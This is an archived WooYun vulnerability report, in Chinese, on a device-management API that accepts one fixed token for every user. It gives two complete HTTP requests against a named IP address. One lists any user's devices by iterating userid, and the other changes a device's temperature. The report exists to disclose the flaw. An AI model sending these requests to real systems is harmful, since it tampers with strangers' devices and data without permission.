乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-02: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-09-16: 厂商已经主动忽略漏洞,细节向公众公开
嗯,这个也可以加热一下
POST /networker/AppServer/device.php HTTP/1.1Content-Length: 58Content-Type: application/x-www-form-urlencodedHost: 218.244.138.2Connection: closeAccept-Encoding: gzipaction=list&userid=61&token=Y29tLmVsc29uaWMuTlRlbXB1cmU%3D
token是固定,只需要遍历userid即可,遍历所有用户的设备
得到设备id之后,就可以直接对设备进行修改
POST /networker/AppServer/device.php HTTP/1.1Content-Length: 93Content-Type: application/x-www-form-urlencodedHost: 218.244.138.2Connection: Keep-AliveAccept-Encoding: gzipaction=switchmanual&userid=47&token=Y29tLmVsc29uaWMuTlRlbXB1cmU%3D&deviceid=1306&tempure=32.0
过滤
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)